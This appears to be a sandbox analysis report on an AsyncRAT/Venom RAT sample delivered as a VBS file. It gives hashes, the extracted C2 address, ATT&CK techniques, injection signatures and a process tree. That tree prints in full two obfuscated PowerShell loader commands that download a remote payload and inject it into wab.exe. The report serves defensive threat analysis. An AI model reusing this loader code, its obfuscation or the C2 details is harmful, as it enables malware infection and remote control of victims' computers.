asyncrat | 255c4ecba922d8b56534bd7a571525c67eb39bbef0f18bc96e414160a95fc2f6

General

Target

file.vbs
Size

897KB
MD5

c983e816294b2d4c2213db5bc4339393
SHA1

4eb96d15af10865ac93ed29ec475bb8eafe91ea3
SHA256

255c4ecba922d8b56534bd7a571525c67eb39bbef0f18bc96e414160a95fc2f6
SHA512

fac24fd9947e732069c7a3fdcb91376ace629ace66b1e0f9fb384b9ca03725c7f39b8f817c4bea4593595f30ebb67083fbafaebe61bfc59a3176caddf3aeaecb
SSDEEP

12288:qzTzUyR7hSRac+qkLmttaGgMskgqoiMHsp90:UXh+k+taGKqoJO0

Score

10^/10

asyncrat venom clients rat

Malware Config

Extracted

Family

asyncrat

Version

5.0.5

Botnet

Venom Clients

C2

xvern429.duckdns.org:8890

Mutex

Venom_RAT_HVNC_Mutex_Venom RAT_HVNC

Attributes

delay
1
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Blocklisted process makes network request 5 IoCs

Processes:

powershell.exe

flow pid process

16 2300 powershell.exe
18 2300 powershell.exe
21 2300 powershell.exe
23 2300 powershell.exe
24 2300 powershell.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

WScript.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation WScript.exe
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

Processes:

wab.exe

pid process

4668 wab.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exewab.exe

pid process

3496 powershell.exe
4668 wab.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 3496 set thread context of 4668 3496 powershell.exe wab.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exepowershell.exe

pid process

2300 powershell.exe
2300 powershell.exe
3496 powershell.exe
3496 powershell.exe
3496 powershell.exe
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

powershell.exe

pid process

3496 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exewab.exe

description pid process

Token: SeDebugPrivilege 2300 powershell.exe
Token: SeDebugPrivilege 3496 powershell.exe
Token: SeDebugPrivilege 4668 wab.exe

flow	pid	process
16	2300	powershell.exe
18	2300	powershell.exe
21	2300	powershell.exe
23	2300	powershell.exe
24	2300	powershell.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	WScript.exe

pid	process
4668	wab.exe

pid	process
3496	powershell.exe
4668	wab.exe

description	pid	process	target process
PID 3496 set thread context of 4668	3496	powershell.exe	wab.exe

pid	process
2300	powershell.exe
2300	powershell.exe
3496	powershell.exe
3496	powershell.exe
3496	powershell.exe

pid	process
3496	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2300	powershell.exe
Token: SeDebugPrivilege	3496	powershell.exe
Token: SeDebugPrivilege	4668	wab.exe

Suspicious use of WriteProcessMemory 15 IoCs

Processes:

WScript.exepowershell.exepowershell.exe

description	pid	process	target process
PID 3516 wrote to memory of 2300	3516	WScript.exe	powershell.exe
PID 3516 wrote to memory of 2300	3516	WScript.exe	powershell.exe
PID 2300 wrote to memory of 2104	2300	powershell.exe	cmd.exe
PID 2300 wrote to memory of 2104	2300	powershell.exe	cmd.exe
PID 2300 wrote to memory of 3496	2300	powershell.exe	powershell.exe
PID 2300 wrote to memory of 3496	2300	powershell.exe	powershell.exe
PID 2300 wrote to memory of 3496	2300	powershell.exe	powershell.exe
PID 3496 wrote to memory of 4788	3496	powershell.exe	cmd.exe
PID 3496 wrote to memory of 4788	3496	powershell.exe	cmd.exe
PID 3496 wrote to memory of 4788	3496	powershell.exe	cmd.exe
PID 3496 wrote to memory of 4668	3496	powershell.exe	wab.exe
PID 3496 wrote to memory of 4668	3496	powershell.exe	wab.exe
PID 3496 wrote to memory of 4668	3496	powershell.exe	wab.exe
PID 3496 wrote to memory of 4668	3496	powershell.exe	wab.exe
PID 3496 wrote to memory of 4668	3496	powershell.exe	wab.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\file.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3516

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Guttiferae = 1;$Benzinen='Sub';$Benzinen+='strin';$Benzinen+='g';Function Sikkerhedspolitikken($Datamatiserede){$Lemviger=$Datamatiserede.Length-$Guttiferae;For($concocting=5;$concocting -lt $Lemviger;$concocting+=6){$Afbinder100+=$Datamatiserede.$Benzinen.Invoke( $concocting, $Guttiferae);}$Afbinder100;}function natasjas($Svirres){. ($Resultanternes) ($Svirres);}$Allehelgensdag=Sikkerhedspolitikken 'DrikkMLet.ioHospiz,ionoiAfstaljugoslRytmeaVedli/ Till5 Omkl.Utril0Safia Polyn(kapitWLo enigi.dan Aer.d Ideao.ideewKurtisManda PacifN ThioTIndus Regar1Conje0T pir.U,sen0P ric;Vadef gamenWSpeediChronnbanne6Super4Flutt;.loug Gr.mexsamme6 Untr4Trypa;Sorge Myrfor,uligv.karn:Tinwo1Vivif2Her,k1Konst. .hor0Durga),ncon DispuGFrugte Dvnlcra kskEksp.oSamle/Bajon2Pedic0Cytoc1 Irre0Medie0Arbel1Rnebl0 Disp1Czech ,eviF VasoiNerverErfa.eJoinifColeooSelvbxLille/Allel1Stand2Postf1Short.Mal,s0 esun ';$Haandslagene=Sikkerhedspolitikken 'SlangUdeeknsWeeweeModulr ,uri-WalliAJvni,gUdskeedatofnOver,tTryks ';$Funktionserklringen=Sikkerhedspolitikken 'afterh PlectDeklatTudehp B,ndsSt.sk:Logis/Theo /SpottwOilcuwLabrowB.rac.SkiftsTi.gieFecalnEntadd.nstisPartspSny ta NonecChoulemaler.DretscKo,troKabbemBeevi/Lam hpK,stbr Top,o arta/Re.btdOpposlU,tra/Kon,eiFrox,7 TimetMns rdvoicibAutorrBlokd ';$Abrogators=Sikkerhedspolitikken 'g.lli> Rets ';$Resultanternes=Sikkerhedspolitikken ' La.kiA,laseInsenxTaiwa ';$Almene='Nonconcentration';$Korrektiv = Sikkerhedspolitikken 'Bagloe SkancRnt.ehvarrioBened Desm%Fors.aUn pop.eimppPotand nfuaT.lnrtSprogaAct.r%disen\ comeAKor.lb,pinasBarontsammeeDisp.rWhid,gCla.te A.nd.PlakaPF,skei.dekrgNonvi Straf& Mens&R.itb Barb eUrobicSkrmbhSummaoModta perstFishm ';natasjas (Sikkerhedspolitikken 'Besl,$ubestgkurvel.ostso OutbbBedmma.olytl ndo:KlaptOCincivTukaneR.eebrBrne,lProtooPolypyindleaNdr,nlExtretMes.iySimar7Proje5 Ins.=Signa(UnrefcHaremmVejrldSporu Okker/RepeocPligt Stors$A.aniKUnsilo aparrNonrerResereTopatkBlasttDitleiVinkevTorch)Slag, ');natasjas (Sikkerhedspolitikken 'Poten$ BlodgTrlaslPat tospionb tigea letnl Over:O.ienDTvangiDictavHandliBrnehdP,mphi.etaln EthygD,ndelSourby Natt=E.sal$AkutbF SupeuBeve,nFactokSystetSpilli SynuoUntrin jaldsGasleeUproorAfrusk lidelApiolrC.colidancenAcq.ig GlobeThroanDejun.Jord,s T ilpunvenlR ckeiNoneqt Unpo(,agac$I.dgaAKrimibBrndgrPucknoBariug NormaIncomtTndinoInsamrDitrisCount)Rokke ');$Funktionserklringen=$Dividingly[0];$Forfodssnkningers= (Sikkerhedspolitikken ' Sigh$VidnegA.giolBatteoDelngbMe.asaLigeslSydaf: Ca aCre iga AftebLe.anlSpeeceP olamKark,eThyronAnlgs=MuscaNYeanceMesmew Dups-LyefyO UnshbKillojAk,ivevoldtcDobbetM.uth StrukSlucilySk ersConvit ConjeStatsmFo.et. CausNPolyee Al,mtHo.se. InveWSpilleStnk bAnimeCProtel SlgtiCcilie.uancnKvldct');$Forfodssnkningers+=$Overloyalty75[1];natasjas ($Forfodssnkningers);natasjas (Sikkerhedspolitikken 'Samle$ F.rnCStr baVitribC.ppil.culkeOrganmL troeUn.annNo cu.RelenHFrsn,eKrediaRylerdOver,eD,skerechoisTernr[Spec.$BlaabH MolmaKnib.a lhenChi.kdCo,mosUndd lCathea Pigeg levaeRe.nfnsa vne.eade]Inapp=level$ In oA CykelIndgrlDr,cueCrow.hPl,aseforudl GylpgNonreeP incnColo.svenend Hemia Int g Korr ');$Fyldigstes3=Sikkerhedspolitikken 'U,ern$Skg,sC PresaPtyalbProb l,repoepreshm ,iale amornBott . StaaDHepato HandwElefan Rel,lPlotxoNomadaCu,tod reorFL.sseiKrestlAggreeFakto(Mascu$OsphrFHjp,luCremenCasinkMilittBaskeiFangeoStartnUv shsFlagde sandrGrafikIndh,lnephrrDi.tai,isaun SamagPracteSmu.tn Iglu,Vider$Okaf.UOversnSubsidSpi,de ud,vrVarmesSt pfgPoundtTtesaeHoorasBrief)Aram, ';$Undersgtes=$Overloyalty75[0];natasjas (Sikkerhedspolitikken 'Nymph$BalkagStudelHexago F,jlbPunicaI.deslM.rke: PallCM,reraConneb hichb,nacqi ,andeC chv=Rheg,(TestaTOm.tdegaelns .tratkikr -BolerPForbjaNon,etTwoneh Paa, Kasse$SlidsUDoundnZeugodthreneNereirKompasLubecgPostptTilreeCalipsLaan.) Misd ');while (!$Cabbie) {natasjas (Sikkerhedspolitikken 'Enami$HumorgRhynilBl.dhoElimib jernagevrelFremm:Filmiu.ersldIod,tluncurbFou.teLnrelrKhap,eLejetsS mio=Toil $ AptitKlamprParolu.orpheHande ') ;natasjas $Fyldigstes3;natasjas (Sikkerhedspolitikken 'TildkS UncutPrinta UkonrHittet ati-RegioS SprolThesoePor.eepseudpColor Polym4Trstu ');natasjas (Sikkerhedspolitikken ' Unde$Lyreng Sto.lDeklaoUdefibTelesaVederlRosem: BuskCFormuaFo lbb S.ltbGeo iiLivseeSphyg=Fedts(EmmerT La,deLie osCleartVognm-S,lonPAfleda GuldtBrugshfamil Smask$OxideUSpec.nPlowmd S erePorosrAnodisBeskjgKogeptJ.suieAfmejsCoesi)Farve ') ;natasjas (Sikkerhedspolitikken 'B,squ$ a xegfilmkl Unspo Mor,bMyeloaAfhngl Djae:RepliSTaksetWrinkrBreddiRuddevSignaySn,rr=Rachi$E,trag sp.ol CommoTermibDgnbeamaximlU.ius:AntincAnkeruKvotadPam ldI dorl AteleValgrs Stipo,alesm gu.ue .ort+Trill+Bulle%Dusse$BonzeDOr.ani Wh,svVerani dsstdharmeiBredsnNicolg Comil En,oygeo.a.Fler.c ikto Brdfu,punknEl.xetOutst ') ;$Funktionserklringen=$Dividingly[$Strivy];}$Dustpan=301913;$Eyl=29401;natasjas (Sikkerhedspolitikken 'Snkek$Voldgg Overl ootloSindsbT llaaUnt,ulPhosp: D.plOB.illv Overe,ectirGeik eUop.rdAb,oa ,rott=Ine,p S.ejGg vineKlodstIn.er-MelliCDubbioturannmillit SpraeLyttenFuldttTaxas M,nom$StranUba,rnnBrugsdLon ie,nexarLemlssPh.togBair tOpr.ae StamsAncyl ');natasjas (Sikkerhedspolitikken 'Dehyd$Stu.ag OverlImbeco regrbPicasa Vicel F,gs:AmpliNSgangoTe.ran,iarra DecodBurb,hDi see Ve dsMarikiFarv v A.ideUnsallKr egyCeli. Endol= Egen Tilsk[ ToniSBoatlyEja usG lintOffloeK,rnam Skaf.FlerdCVandroKa,itnFordmvUndereLevnirVocimt.rott]W oli:F mvr:RitheF PortrBefleo Agelm Re.oBWi,dla OversParaleFrie,6R,cur4SuperSSlagtt ModsrAnticicytobnStyrbgTypog(Excys$PicofOIs,gov .ateeHealsr.ildeevrdikd,mdbn) dtyn ');natasjas (Sikkerhedspolitikken ' Chr $FinlngNontelAflivo.affebdiag,aNonaglrhod.:BegumS rudtiIhidigRingmnKinksapolyptB.dtiu Arc.rDowief visoApolorS.artkSide lEndotaFiskerRipariStivsn.uksug aijaeForspn P.lv crev,= Udgr Flan[ prelS tenbyUndersKis,etunstreAma.emLay o.PhyllTdemoneadelsxKonsttUdtrr.Fla.nEP.rvenUdvalc,hrusohalocd Br.li RedonBonnegAnsva]lidia:Notes:.thnoAtheurSBev dC RediI SkydI.ouga. AngiGPalm e Win.tMaskiSBloustErgotrDe.enirinnenConsugFdse ( Chol$Nedt.NReklao alponPhotiaF ypadpi.cph radie flyvsIlysaiW ippvS.stee BestlB,oksyGr,nd)Time, ');natasjas (Sikkerhedspolitikken 'Staal$ BitrgRe.eclDa skoPos,tb ereaaMon.tlAlgo,:B skvSUn.evp Pre i onjrUnbelop,oacimet.ldRivet=Rge.i$BiarcSM,ridiCo.nigEsse,nStandaSaltpt InteuChiv,r BedrfVelkooKil irNyhe kStu il Overa adoirm emoiorthon UrocgNonhyeKnol nSu.li.UidensNoncouUnsucbPalmisSkibstNavnerDaskeiEnkelnSammegHyp,i(B.wra$MisogDNon.auexogesAzocytClickpUnwaraLouisnDrmme,.ryst$PhotoEImmo.y Str.l Neds)Revis ');natasjas $Spiroid;"
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2300

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Absterge.Pig && echo t"
3⤵
PID:2104

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Guttiferae = 1;$Benzinen='Sub';$Benzinen+='strin';$Benzinen+='g';Function Sikkerhedspolitikken($Datamatiserede){$Lemviger=$Datamatiserede.Length-$Guttiferae;For($concocting=5;$concocting -lt $Lemviger;$concocting+=6){$Afbinder100+=$Datamatiserede.$Benzinen.Invoke( $concocting, $Guttiferae);}$Afbinder100;}function natasjas($Svirres){. ($Resultanternes) ($Svirres);}$Allehelgensdag=Sikkerhedspolitikken 'DrikkMLet.ioHospiz,ionoiAfstaljugoslRytmeaVedli/ Till5 Omkl.Utril0Safia Polyn(kapitWLo enigi.dan Aer.d Ideao.ideewKurtisManda PacifN ThioTIndus Regar1Conje0T pir.U,sen0P ric;Vadef gamenWSpeediChronnbanne6Super4Flutt;.loug Gr.mexsamme6 Untr4Trypa;Sorge Myrfor,uligv.karn:Tinwo1Vivif2Her,k1Konst. .hor0Durga),ncon DispuGFrugte Dvnlcra kskEksp.oSamle/Bajon2Pedic0Cytoc1 Irre0Medie0Arbel1Rnebl0 Disp1Czech ,eviF VasoiNerverErfa.eJoinifColeooSelvbxLille/Allel1Stand2Postf1Short.Mal,s0 esun ';$Haandslagene=Sikkerhedspolitikken 'SlangUdeeknsWeeweeModulr ,uri-WalliAJvni,gUdskeedatofnOver,tTryks ';$Funktionserklringen=Sikkerhedspolitikken 'afterh PlectDeklatTudehp B,ndsSt.sk:Logis/Theo /SpottwOilcuwLabrowB.rac.SkiftsTi.gieFecalnEntadd.nstisPartspSny ta NonecChoulemaler.DretscKo,troKabbemBeevi/Lam hpK,stbr Top,o arta/Re.btdOpposlU,tra/Kon,eiFrox,7 TimetMns rdvoicibAutorrBlokd ';$Abrogators=Sikkerhedspolitikken 'g.lli> Rets ';$Resultanternes=Sikkerhedspolitikken ' La.kiA,laseInsenxTaiwa ';$Almene='Nonconcentration';$Korrektiv = Sikkerhedspolitikken 'Bagloe SkancRnt.ehvarrioBened Desm%Fors.aUn pop.eimppPotand nfuaT.lnrtSprogaAct.r%disen\ comeAKor.lb,pinasBarontsammeeDisp.rWhid,gCla.te A.nd.PlakaPF,skei.dekrgNonvi Straf& Mens&R.itb Barb eUrobicSkrmbhSummaoModta perstFishm ';natasjas (Sikkerhedspolitikken 'Besl,$ubestgkurvel.ostso OutbbBedmma.olytl ndo:KlaptOCincivTukaneR.eebrBrne,lProtooPolypyindleaNdr,nlExtretMes.iySimar7Proje5 Ins.=Signa(UnrefcHaremmVejrldSporu Okker/RepeocPligt Stors$A.aniKUnsilo aparrNonrerResereTopatkBlasttDitleiVinkevTorch)Slag, ');natasjas (Sikkerhedspolitikken 'Poten$ BlodgTrlaslPat tospionb tigea letnl Over:O.ienDTvangiDictavHandliBrnehdP,mphi.etaln EthygD,ndelSourby Natt=E.sal$AkutbF SupeuBeve,nFactokSystetSpilli SynuoUntrin jaldsGasleeUproorAfrusk lidelApiolrC.colidancenAcq.ig GlobeThroanDejun.Jord,s T ilpunvenlR ckeiNoneqt Unpo(,agac$I.dgaAKrimibBrndgrPucknoBariug NormaIncomtTndinoInsamrDitrisCount)Rokke ');$Funktionserklringen=$Dividingly[0];$Forfodssnkningers= (Sikkerhedspolitikken ' Sigh$VidnegA.giolBatteoDelngbMe.asaLigeslSydaf: Ca aCre iga AftebLe.anlSpeeceP olamKark,eThyronAnlgs=MuscaNYeanceMesmew Dups-LyefyO UnshbKillojAk,ivevoldtcDobbetM.uth StrukSlucilySk ersConvit ConjeStatsmFo.et. CausNPolyee Al,mtHo.se. InveWSpilleStnk bAnimeCProtel SlgtiCcilie.uancnKvldct');$Forfodssnkningers+=$Overloyalty75[1];natasjas ($Forfodssnkningers);natasjas (Sikkerhedspolitikken 'Samle$ F.rnCStr baVitribC.ppil.culkeOrganmL troeUn.annNo cu.RelenHFrsn,eKrediaRylerdOver,eD,skerechoisTernr[Spec.$BlaabH MolmaKnib.a lhenChi.kdCo,mosUndd lCathea Pigeg levaeRe.nfnsa vne.eade]Inapp=level$ In oA CykelIndgrlDr,cueCrow.hPl,aseforudl GylpgNonreeP incnColo.svenend Hemia Int g Korr ');$Fyldigstes3=Sikkerhedspolitikken 'U,ern$Skg,sC PresaPtyalbProb l,repoepreshm ,iale amornBott . StaaDHepato HandwElefan Rel,lPlotxoNomadaCu,tod reorFL.sseiKrestlAggreeFakto(Mascu$OsphrFHjp,luCremenCasinkMilittBaskeiFangeoStartnUv shsFlagde sandrGrafikIndh,lnephrrDi.tai,isaun SamagPracteSmu.tn Iglu,Vider$Okaf.UOversnSubsidSpi,de ud,vrVarmesSt pfgPoundtTtesaeHoorasBrief)Aram, ';$Undersgtes=$Overloyalty75[0];natasjas (Sikkerhedspolitikken 'Nymph$BalkagStudelHexago F,jlbPunicaI.deslM.rke: PallCM,reraConneb hichb,nacqi ,andeC chv=Rheg,(TestaTOm.tdegaelns .tratkikr -BolerPForbjaNon,etTwoneh Paa, Kasse$SlidsUDoundnZeugodthreneNereirKompasLubecgPostptTilreeCalipsLaan.) Misd ');while (!$Cabbie) {natasjas (Sikkerhedspolitikken 'Enami$HumorgRhynilBl.dhoElimib jernagevrelFremm:Filmiu.ersldIod,tluncurbFou.teLnrelrKhap,eLejetsS mio=Toil $ AptitKlamprParolu.orpheHande ') ;natasjas $Fyldigstes3;natasjas (Sikkerhedspolitikken 'TildkS UncutPrinta UkonrHittet ati-RegioS SprolThesoePor.eepseudpColor Polym4Trstu ');natasjas (Sikkerhedspolitikken ' Unde$Lyreng Sto.lDeklaoUdefibTelesaVederlRosem: BuskCFormuaFo lbb S.ltbGeo iiLivseeSphyg=Fedts(EmmerT La,deLie osCleartVognm-S,lonPAfleda GuldtBrugshfamil Smask$OxideUSpec.nPlowmd S erePorosrAnodisBeskjgKogeptJ.suieAfmejsCoesi)Farve ') ;natasjas (Sikkerhedspolitikken 'B,squ$ a xegfilmkl Unspo Mor,bMyeloaAfhngl Djae:RepliSTaksetWrinkrBreddiRuddevSignaySn,rr=Rachi$E,trag sp.ol CommoTermibDgnbeamaximlU.ius:AntincAnkeruKvotadPam ldI dorl AteleValgrs Stipo,alesm gu.ue .ort+Trill+Bulle%Dusse$BonzeDOr.ani Wh,svVerani dsstdharmeiBredsnNicolg Comil En,oygeo.a.Fler.c ikto Brdfu,punknEl.xetOutst ') ;$Funktionserklringen=$Dividingly[$Strivy];}$Dustpan=301913;$Eyl=29401;natasjas (Sikkerhedspolitikken 'Snkek$Voldgg Overl ootloSindsbT llaaUnt,ulPhosp: D.plOB.illv Overe,ectirGeik eUop.rdAb,oa ,rott=Ine,p S.ejGg vineKlodstIn.er-MelliCDubbioturannmillit SpraeLyttenFuldttTaxas M,nom$StranUba,rnnBrugsdLon ie,nexarLemlssPh.togBair tOpr.ae StamsAncyl ');natasjas (Sikkerhedspolitikken 'Dehyd$Stu.ag OverlImbeco regrbPicasa Vicel F,gs:AmpliNSgangoTe.ran,iarra DecodBurb,hDi see Ve dsMarikiFarv v A.ideUnsallKr egyCeli. Endol= Egen Tilsk[ ToniSBoatlyEja usG lintOffloeK,rnam Skaf.FlerdCVandroKa,itnFordmvUndereLevnirVocimt.rott]W oli:F mvr:RitheF PortrBefleo Agelm Re.oBWi,dla OversParaleFrie,6R,cur4SuperSSlagtt ModsrAnticicytobnStyrbgTypog(Excys$PicofOIs,gov .ateeHealsr.ildeevrdikd,mdbn) dtyn ');natasjas (Sikkerhedspolitikken ' Chr $FinlngNontelAflivo.affebdiag,aNonaglrhod.:BegumS rudtiIhidigRingmnKinksapolyptB.dtiu Arc.rDowief visoApolorS.artkSide lEndotaFiskerRipariStivsn.uksug aijaeForspn P.lv crev,= Udgr Flan[ prelS tenbyUndersKis,etunstreAma.emLay o.PhyllTdemoneadelsxKonsttUdtrr.Fla.nEP.rvenUdvalc,hrusohalocd Br.li RedonBonnegAnsva]lidia:Notes:.thnoAtheurSBev dC RediI SkydI.ouga. AngiGPalm e Win.tMaskiSBloustErgotrDe.enirinnenConsugFdse ( Chol$Nedt.NReklao alponPhotiaF ypadpi.cph radie flyvsIlysaiW ippvS.stee BestlB,oksyGr,nd)Time, ');natasjas (Sikkerhedspolitikken 'Staal$ BitrgRe.eclDa skoPos,tb ereaaMon.tlAlgo,:B skvSUn.evp Pre i onjrUnbelop,oacimet.ldRivet=Rge.i$BiarcSM,ridiCo.nigEsse,nStandaSaltpt InteuChiv,r BedrfVelkooKil irNyhe kStu il Overa adoirm emoiorthon UrocgNonhyeKnol nSu.li.UidensNoncouUnsucbPalmisSkibstNavnerDaskeiEnkelnSammegHyp,i(B.wra$MisogDNon.auexogesAzocytClickpUnwaraLouisnDrmme,.ryst$PhotoEImmo.y Str.l Neds)Revis ');natasjas $Spiroid;"
3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3496

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Absterge.Pig && echo t"
4⤵
PID:4788

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:4668

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5h5dng0s.frw.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Absterge.Pig
Filesize
431KB

MD5
ce1f757dad7e08f32964a255a380674e

SHA1
19e38ec002272355856d0f68324c0b18a7a07dc0

SHA256
4e0fe5353ac7e82175ab48a53995198157b546bb2eec91ee1d7d63432b710548

SHA512
ad6b88260234a1abf893680f0332510cd08f9192b6e76478c962203617e689b9cf538f7b2aa44422493d4a80b872a24bcf4258e17a540eaf901a59f37933707e

Download Submit
memory/2300-10-0x000001BA79990000-0x000001BA799B2000-memory.dmp

Filesize
136KB

Download
memory/2300-11-0x00007FFA18130000-0x00007FFA18BF1000-memory.dmp

Filesize
10.8MB

Download
memory/2300-12-0x00007FFA18130000-0x00007FFA18BF1000-memory.dmp

Filesize
10.8MB

Download
memory/2300-66-0x00007FFA18130000-0x00007FFA18BF1000-memory.dmp

Filesize
10.8MB

Download
memory/2300-0-0x00007FFA18133000-0x00007FFA18135000-memory.dmp

Filesize
8KB

Download
memory/2300-61-0x00007FFA18130000-0x00007FFA18BF1000-memory.dmp

Filesize
10.8MB

Download
memory/2300-60-0x00007FFA18133000-0x00007FFA18135000-memory.dmp

Filesize
8KB

Download
memory/3496-22-0x0000000005370000-0x0000000005998000-memory.dmp

Filesize
6.2MB

Download
memory/3496-25-0x0000000005B00000-0x0000000005B66000-memory.dmp

Filesize
408KB

Download
memory/3496-36-0x0000000006140000-0x000000000615E000-memory.dmp

Filesize
120KB

Download
memory/3496-37-0x0000000006170000-0x00000000061BC000-memory.dmp

Filesize
304KB

Download
memory/3496-38-0x00000000079C0000-0x000000000803A000-memory.dmp

Filesize
6.5MB

Download
memory/3496-39-0x0000000006720000-0x000000000673A000-memory.dmp

Filesize
104KB

Download
memory/3496-40-0x0000000007440000-0x00000000074D6000-memory.dmp

Filesize
600KB

Download
memory/3496-41-0x00000000073A0000-0x00000000073C2000-memory.dmp

Filesize
136KB

Download
memory/3496-42-0x00000000085F0000-0x0000000008B94000-memory.dmp

Filesize
5.6MB

Download
memory/3496-35-0x0000000005B70000-0x0000000005EC4000-memory.dmp

Filesize
3.3MB

Download
memory/3496-44-0x0000000008BA0000-0x0000000009AC9000-memory.dmp

Filesize
15.2MB

Download
memory/3496-24-0x0000000005A90000-0x0000000005AF6000-memory.dmp

Filesize
408KB

Download
memory/3496-23-0x00000000052A0000-0x00000000052C2000-memory.dmp

Filesize
136KB

Download
memory/3496-21-0x0000000002840000-0x0000000002876000-memory.dmp

Filesize
216KB

Download
memory/4668-62-0x0000000000DD0000-0x0000000002024000-memory.dmp

Filesize
18.3MB

Download
memory/4668-63-0x0000000000DD0000-0x0000000000DE6000-memory.dmp

Filesize
88KB

Download
memory/4668-67-0x0000000020A50000-0x0000000020AEC000-memory.dmp

Filesize
624KB

Download

Analysis

Sharing